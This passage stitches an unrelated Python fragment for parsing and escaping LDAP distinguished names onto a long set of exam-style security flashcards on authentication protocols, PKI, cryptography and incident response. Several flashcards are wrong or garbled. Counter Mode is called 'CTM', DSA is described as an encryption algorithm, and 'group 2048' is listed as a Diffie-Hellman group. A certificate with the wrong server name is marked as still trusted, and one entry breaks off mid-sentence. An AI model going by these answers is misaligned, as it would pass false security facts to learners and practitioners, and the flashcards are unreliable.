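# Most specific first, broadest last, as ordered on this page.
SPECIFICITY = ["CN", "OU", "O", "C", "DC"]
_SPECIAL = ',+"\\<>;='          # characters that must be escaped inside a value


def _split_unescaped(s: str, sep: str):
    """Split on `sep` while skipping backslash-escaped characters (RFC 4514 style)."""
    parts, cur, i = [], [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            cur.append(s[i:i + 2])            # keep the escape pair for now
            i += 2
        elif s[i] == sep:
            parts.append("".join(cur))
            cur = []
            i += 1
        else:
            cur.append(s[i])
            i += 1
    parts.append("".join(cur))
    return parts


def _unescape(s: str) -> str:
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_dn(dn: str):
    """Parse 'CN=x,OU=y,...' into [(ATTR, value), ...] in the order written."""
    rdns = []
    for part in _split_unescaped(dn, ","):
        if "=" not in part:
            raise ValueError("RDN without '=': %r" % part)
        attr, value = part.split("=", 1)       # attribute types never contain '='
        rdns.append((attr.strip().upper(), _unescape(value.strip())))
    return rdns


def is_most_specific_first(rdns) -> bool:
    """The page's rule: specificity never increases as you move right.
    Attribute types not in SPECIFICITY (e.g. L, ST) are ignored."""
    ranks = [SPECIFICITY.index(a) for a, _ in rdns if a in SPECIFICITY]
    return all(x <= y for x, y in zip(ranks, ranks[1:]))


def to_string(rdns) -> str:
    """Serialize back to DN syntax, escaping special characters in values."""
    def esc(v: str) -> str:
        v = "".join("\\" + c if c in _SPECIAL else c for c in v)
        if v.startswith("#") or v.startswith(" "):
            v = "\\" + v
        if v.endswith(" ") and not v.endswith("\\ "):
            v = v[:-1] + "\\ "
        return v
    return ",".join("%s=%s" % (a, esc(v)) for a, v in rdns)
```

The escaping matters in practice: a naive `split(",")` on a DN such as `CN=Smith\, Alice,OU=Sales,...` produces a bogus extra RDN, which is a common source of authorization bugs in code that compares or filters on DNs.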
Analyze and select the items demonstrating advantages Terminal Access Controller Access-Control System Plus (TACACS+) has over Remote Authentication Dial-In User Service (RADIUS). (Select two)
TACACS+ is similar to RADIUS, but Cisco designed it with flexibility in mind. Its connection-oriented delivery method increases reliability and flexibility. It is supported by third parties and open-source RADIUS implementations. All data in TACACS+ packets is encrypted (not just authentication data).
How does Security Assertion Markup Language (SAML) allow a Service Provider (SP) to trust an Identity Provider (IdP) in a federated network?
SAML tokens are signed with an eXtensible Markup Language (XML) digital signature
OpenID and OpenID Connect (OIDC)
are examples of user-centric identity management protocols, whereas SAML implementations are controlled by the system, or enterprise controlled. These use JavaScript Object Notation (JSON) and JSON Web Tokens (JWT) rather than eXtensible Markup Language (XML).
In the Server Manager tool menu, the person installing the RADIUS client chooses and confirms the shared secret for the RADIUS client.
True
Name a primary difference between RADIUS and TACACS+.
TACACS+ is able to operate Authentication, Authorization, and Accounting (AAA) functions separately, which gives it greater flexibility for device management, whereas RADIUS is used more for user network remote access.
What makes the basic version of Lightweight Directory Access Protocol (LDAP) protocol vulnerable to Denial of Service (DoS) attacks?
The server does not require client authentication
The fact that transmissions are in plaintext makes the basic LDAP vulnerable to sniffing and man-in-the-middle attacks.
True
Analyze the following statements and select the statement accurately describing the difference between OAuth and OpenID Connect (OIDC).
OAuth provides authorization services only, while OpenID Connect (OIDC) provides federated authentication
In an enterprise-controlled federated identity management solution, such as Security Assertion Markup Language (SAML), the choice of identity provider (IdP) is out of the user's hands, whereas OpenID Connect is user-centric: the user selects their IdP.
True
Compare features of Shibboleth and Security Assertion Markup Language (SAML) and determine what Shibboleth provides that SAML does not.
One of Shibboleth's main components, the Embedded Discovery Service, allows the user to choose a preferred identity provider. The user does not choose the identity provider in Security Association Markup Language (SAML).
In the Kerberos authentication system, the ticket granting ticket (TGT) is a logical token. What information does this ticket convey?
Time stamp, name and IP address
Which authentication protocols perform mutual authentication?
Kerberos and Microsoft Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2)
Attribute-Based Access Control (ABAC)
is the ideal choice for assigning complex rule-based privileges. It makes access decisions based on subject and object attributes, as well as context-dependent and system-wide attributes, making it the most fine-tuned control.
A series of binary data are used for biometric enrollment. What information does this binary data store?
A biometric template
ACEs do not have to be in a certain order to enforce the ACL properly.
False
What technical challenges must biometric technologies overcome to be more effective today?
Pattern matching from templates; biometric template storage and security
HMAC-Based One-time Password Algorithm (HOTP) and Time-Based One-time Password Algorithm (TOTP) derive their codes from a shared secret using HMAC (HOTP from a counter, TOTP from the current time step); the codes are not passwords chosen by the user.
True
Susceptibility to interception is not a risk associated with one-time passwords.
False
In Windows Active Directory, how do Organizational Units (OUs) help account managers designate permissions?
OUs divide a domain into different administrative realms
What vulnerability does User Account Control (UAC) protect against?
Using administrative accounts for mundane tasks
Generic Account Prohibition
It is best practice to use the default administrator accounts only to install the operating system (OS). Then they should be disabled. This makes it harder for attackers to find and compromise an admin account.
The rights and memberships of domain local and global groups are essentially opposite in scope.
True
How does general account prohibition add a layer of safety to an Operating System (OS)?
General account prohibition makes it harder to identify and compromise an administrative account
workflow
is an onboarding process that involves identifying the roles and permissions users need. It is often a visual representation of an organization, organized by permissions and account types.
Privilege bracketing
The security method of allowing privileges to a user only when needed and revoking them as soon as the task is complete.
Microsoft's rule
"Accounts go into Global groups, which go into Domain Local groups, which get Permissions" (AGDLP)
Which type of service account has the most privileges?
System
In an Active Directory (AD), which type of group allows permissions over devices such as printers and file shares?
Domain local groups
Service Level Agreement (SLA)
is a contractual agreement setting out detailed terms (including support metrics) for future provided services.
Interconnection Security Agreement (ISA)
is used when a federal agency interconnects its IT system with a third party's.
Adverse actions
are actions outlined and classified in a policy as a violation. Common ones that are part of a fair use policy are the use of equipment to defraud, defame, or to obtain illegal material. Prohibiting the use of cameras or video is also common.
Malicious actions
are actions intended to cause harm. Damaging company property, security breaches, and data theft are examples.
exploit
is the action of taking advantage of a weakness
Memorandum of Agreement (MOA)
is a formal agreement, or contract, that contains specific obligations rather than a broad understanding.
Privacy Threshold Analysis (PTA)
is an initial audit to determine whether a computer system or workflow collects, stores, or processes PII to the degree where a PIA must be performed.
Privacy Impact Assessment (PIA)
is performed to identify vulnerabilities that may lead to data breach when storing, processing, and disclosing Personally Identifiable Information (PII). It also evaluates controls mitigating those risks.
system of records notice (SORN)
is a formal document listing PII maintained by a federal agency of the US government.
Incident Response Life Cycle
Preparation; Detection & Analysis; Containment, Eradication & Recovery; Post-Incident Activity
Tabletop Exercise
staff will "ghost" the same procedures as they would in a disaster, without actually creating disaster conditions or applying or changing anything.
Data integrity is typically the most important factor in prioritizing incidents and will often be based on the value of the at-risk data.
True
Escalation
happens when additional senior staff become involved in the management of an incident.
order of volatility
serves as a guideline for determining what types of storage is more or less volatile than the other. Central processing unit (CPU) registers are extremely volatile. An Address Resolution Protocol (ARP) cache contains network addresses, and is highly volatile.
System memory is used for temporary storage, and is more volatile than a temporary file system
True
In terms of order of volatility, which is more volatile, a temporary file system or an ARP cache?
ARP cache
System memory is used for temporary storage, and is more volatile than cache memory.
False
System images
are copies of entire computer systems or data.
Image Acquisition
is a data backup/cloning technique, and is used in forensics.
Hashing should be used with system images.
True
Legal holds
refer to information that may be relevant to a court case that must be preserved. This may include data or entire computer systems.
Preservation of evidence
is focused on ensuring evidence remains credible.
Keeping a valid timeline of events (such as a chain of custody) is an example of what?
preservation of evidence practice.
This is an example of snapshot technology.
Volume Shadow Copy Service (VSS)
Synchronous replication is particularly sensitive to distance.
True
Asynchronous replication
mirrors data from a primary site to a secondary site, with the primary acknowledging writes before the secondary has confirmed them. It tolerates distance and latency better than synchronous replication, at the cost of a replication lag during which the secondary can be slightly behind.
fair use policy is an example of what type of control?
Administrative control
Data sovereignty
means that data is subject to the laws of the nation in which it is collected or stored. Nations differ in how much they protect data privacy, so where data is stored must be considered with care.
technical control
is implemented in operating systems, software, and security appliances. Examples include Access Control Lists (ACL) and Intrusion Prevention Systems (IPS). An ACL is used to provide access to a system resource.
Administrative security controls
are used to determine behavior through policies, procedures, and guidance.
compensating control
does not prevent an attack, but provides an alternative means of meeting a control objective when the primary control is unavailable or impractical, such as restoring functionality from a backup.
corrective control
responds to and fixes an incident. It may also prevent reoccurrence. An example is antivirus software.
deterrent control
may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion. A warning sign is an example.
detective control
may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A security camera system is an example.
data owner
has the ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. They are also responsible for labeling the asset (such as determining who should have access and determining the asset's criticality and sensitivity).
data steward
is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata, and that data is collected and stored in a format that complies with regulations.
data custodian
is responsible for managing the system where the data assets are stored. This includes responsibility for enforcing access control, encryption, along with backup and recovery measures.
system administrator
is responsible for ensuring the upkeep of the technical systems that provide functionality for the business.
Pulping
takes shredding one step further. Once data (such as documents) are subjected to shredding, the remains can be mixed with water (for example) for further destruction. Note that in this case, data is mentioned and not a storage disk which would likely use another method.
Archives
refer to sets of data. Since
data in use
is when data is present in volatile memory, such as system RAM or CPU cache.
data at rest
state means that the data is in some sort of persistent storage media. Examples of data include archived audiovisual media.
data in transit
is when data is transmitted over a network. The data can be sent over the WAN to its final location through a virtual private network (VPN).
In-band key exchange
(over an unencrypted channel) uses asymmetric encryption. The secret key is encrypted with recipient's public key and is decrypted by recipient's private key.
Out-of-band key exchange
involves sending the key by courier or transmitting it verbally. However, these methods increase the risk that the key will be compromised.
ticket granting service
is used by Kerberos for authentication services. Single Sign-On (SSO) services rely on Kerberos.
What is another term used for a "session key" when being exchanged in a digital envelope?
Secret key
Side Channel Attack
Gathering outside information by watching how a cryptographic system behaves, with the goal of uncovering the encryption key. It means monitoring things like timing, power consumption, and electromagnetic emanation. These have a physical relation to the system.
Keyspace
is a range of key values available to use with a particular cipher. It is approximately equivalent to two to the power of the size of the key. Using a longer key, such as 2048 bits rather than 1024 bits, makes the encryption scheme stronger.
substitution cipher
is an obfuscation technique where each unit of plaintext is kept in the same sequence when converted to ciphertext, but the actual value of the unit changes.
transposition cipher
the units of plaintext stay the same, but their order is changed according to a mechanism. For example, "HLOOLELWRD" would mean "HelloWorld".
Ciphertext
is data encoded with a cipher, which is an algorithm used to encrypt or decrypt data.
Ephemeral key
is the main component of ECDHE that gives it perfect forward secrecy. There is a different secret key for each session during transport.
PRNG (pseudorandom number generation)
is the process by which an algorithm produces numbers that approximate randomness without being truly random.
OTP (one time pad)
is an unbreakable encryption mechanism. It consists of exactly the same number of characters as the plaintext and must be generated by a truly random algorithm.
Confusion
means the key should not be derivable from the ciphertext. This can be achieved through more complex substitution and transposition operations.
Diffusion
means if any one bit of the plaintext is changed, many bits in the ciphertext will change. It is obtained through transposition.
Elliptic Curve Cryptography (ECC)
is a type of trapdoor function used to generate public/private key pairs. Combined with D-H Ephemeral Mode (ECDHE), it provides a Perfect Forward Secrecy (PFS) mechanism for Transport Layer Security (TLS).
DSA (Digital Signature Algorithm)
is an adaptation of ElGamal's algorithm used for encryption and digital signing, rather than simply a mechanism for agreeing to a shared secret.
Group
can be any mathematical operation with the properties of a trapdoor function. Common groups used are group 1 (768-bit), group 2 (1024-bit), group 5 (1536-bit), and group 2048 (2048-bit).
ElGamal
Based on Diffie-Hellman and was invented in 1984 by Taher Elgamal. It is used in PGP implementations and GNU Privacy Guard software. The algorithm consists of three parts: the key generator, the encryption algorithm, and the decryption algorithm. This was made publicly available.
GCM (Galois Counter Mode)
combines the ciphertext with a type of message authentication code (GMAC), like an HMAC (hash-based message authentication code), to provide native message integrity.
CTM (Counter Mode)
functions like a stream cipher, but each block is combined with a nonce (non-repeating) counter value. This allows each block to process in parallel using multi-core CPUs.
ECB (Electronic Code Book) mode
applies the same key to each plaintext block. This indicates identical plaintext blocks can output identical ciphertexts, making the ciphertext vulnerable to cryptanalysis.
CBC (Cipher Block Chaining) mode
improves ciphertext integrity by applying an Initialization Vector (IV) to the first plaintext block and ensures the key produces a unique ciphertext from any given plaintext.
Bcrypt
is used in key stretching.
Key stretching
involves the initial key going through thousands of rounds of hashing. This makes it harder to apply brute force attacks on password hashes.
PBKDF2 (Password-Based Key Derivation Function 2)
is also used for key stretching like Bcrypt.
CBC (Cipher Block Chaining)
is not a cipher, but rather a cipher mode applying an Initialization Vector (IV) to improve ciphertext integrity and ensure a unique ciphertext with any plaintext.
Password-Based Key Derivation Function 2 (PBKDF2) uses RSA Security's Public Key Cryptography Standards (PKCS #5).
True
FIPS or Federal Information Processing Standards
is a set of standards adopted for use on government systems. The Secure Hashing Algorithm (SHA) is an example of a hashing algorithm listed there.
ROT13 (an example of a Caesarian cipher)
rotates each letter 13 places (so A becomes N, for instance). This is how the ciphertext "Uryyb Jbeyq" means "Hello World".
XOR operation
encodes a message where a value is combined with the plaintext message. XOR produces 0 if both values are the same, and 1 if the values are different.
PSK (Pre-shared Key)
is the password needed to gain access to a WAP. An example is a WPA2-enabled PSK. Using a personal password will not work.
Although a company's splash page or captive portal may advertise free Wi-Fi, it may only be for a predefined time. After this predetermined time, a payment must be made for extended access.
True
open configuration
means setting no security configurations on the WAP. It can also mean removing all other security settings like MAC filtering or disabling ports to ensure a specific setting may not be blocking network access.
802.1x
is a Port-Based Network Access Control (PNAC) mechanism that uses Extensible Authentication Protocol (EAP). Selecting the "Enterprise" option on a wireless router enables the use of 802.1x.
RADIUS federation
means that multiple organizations allow access to one another's users by joining their RADIUS servers into a RADIUS hierarchy or mesh.
For Guest Wi-Fi connections, 802.1x is almost never implemented.
True
user certificate
is the most common certificate loaded onto an employee's smart card. In a Windows Active Directory environment, a user certificate will identify the user, and grant user access.
machine certificate
is not loaded onto a card but rather installed on a machine such as a server. It identifies the machine from a trusted CA (Certificate Authority) hierarchy.
wildcard certificate
describes a certificate used with multiple subdomains of a domain. These are not usually placed on a smart card.
SAN (Subject Alternative Name)
is an extension field on a web server certificate using multiple subdomain labels to support the identification of the server.
trust model
is a concept of the PKI (Public Key Infrastructure) to show how users and different CAs (Certificate Authorities) can trust one another. This is detailed in a certificate's certification path leading back to the root CA.
Stapling
is a term used with OCSP (Online Certificate Status Protocol) where an SSL/TLS web server makes periodic requests to a CA about certificate statuses to reduce resource demands.
Certificate pinning
refers to validating a website's certificate by checking public keys of previously known certificates in the chain. It is not dependent on an offline CA.
root CA (Certificate Authority)
is the top level of the certificate hierarchy.
The intermediate Certificate Authority (CA) or subordinate CA
is in the middle of the certificate hierarchy.
The issuing CA
is the third level of the certificate hierarchy.
Registration
is a built-in function of certificate authorities. However, the function can be delegated to one or more registration authorities. These do not sign or issue certificates.
PFX or .pfx or .p12 extension
allows the export of a certificate along with its private key and is password protected. Commonly used to archive or transport a private key.
P7B or .p7b extension
bundles multiple certificates into a single file. It is often used to deliver a chain of certificates that must be trusted by the processing host. It does not contain a private key.
CER or .cer extension
is an actual certificate that can contain either binary DER (Distinguished Encoding Rules) or ASCII PEM data.
DER (Distinguished Encoding Rules)
All certificates use an encoding scheme to create a binary form of a certificate instead of the ASCII PEM format. Files can have extensions of either .der or .cer.
certification path, also known as "certificate chaining" or a "chain of trust,"
is a verifiable path of the leaf certificate to the root CA (Certificate Authority). Both web certificates must show the same path.
HPKP (HTTP Public Key Pinning)
is a method of trusting digital certificates to bypass the CA hierarchy and chain of trust, and minimize MITM attacks. The client stores a public key that belongs (or is pinned) to a web server. If visiting again and the key does not exist in the certificate chain, a warning is presented.
CSR (Certificate Signing Request)
is a Base64 ASCII file sent by a subject to a CA to get a certificate.
Private organizations must load employee web browsers with internal root certificates to verify internal websites.
True
A computer certificate is only installed on the server that it identifies. Computer certificates are not shared.
True
code signing certificate
is issued to a software publisher. The publisher uses this to sign the executables or DLLs that make up the program and guarantee the validity of the software.
registration authority
is a server assigned the task to complete identity checks and submit CSRs on behalf of end users. However, they do not actually sign or issue certificates.
CRT or .crt extension
is the same as a .cer file extension. It is a basic certificate that contains information about the subject.
three-level Certificate Authority (CA) hierarchy
can be described with a root server at the top level, an intermediate or subordinate CA in the middle, and an issuing CA that issues signed certificates to users, computers, and other services.
Server or computer certificates can be issued to network appliances, such as routers, switches, and firewalls, so they can identify themselves to the network and gain access to the Local Area Network (LAN).
True
Pinning
refers to several techniques to ensure that a client is inspecting the proper certificate when it inspects the certificate presented by a server or a code-signed application. An example of this is submitting two or more public keys to an HTTP browser.
Extended Validation (EV)
refers to a more rigorous check on a subject's legal identity and control over the domain before issuing a certificate.
Domain Validation (DV)
is proving the ownership of a domain, which may be proved by responding to an email to the authorized point of contact. This process is highly vulnerable to compromise.
X.509
is a certificate standard and format.
Certificates with wrong server names can still be recognized and trusted by its root CA. It will not invalidate a certificate's chain of trust.
True
Worms
are memory-resident viruses that replicate over network resources.
Viruses
These spread from computer to computer, usually by "infecting" executable applications or program code.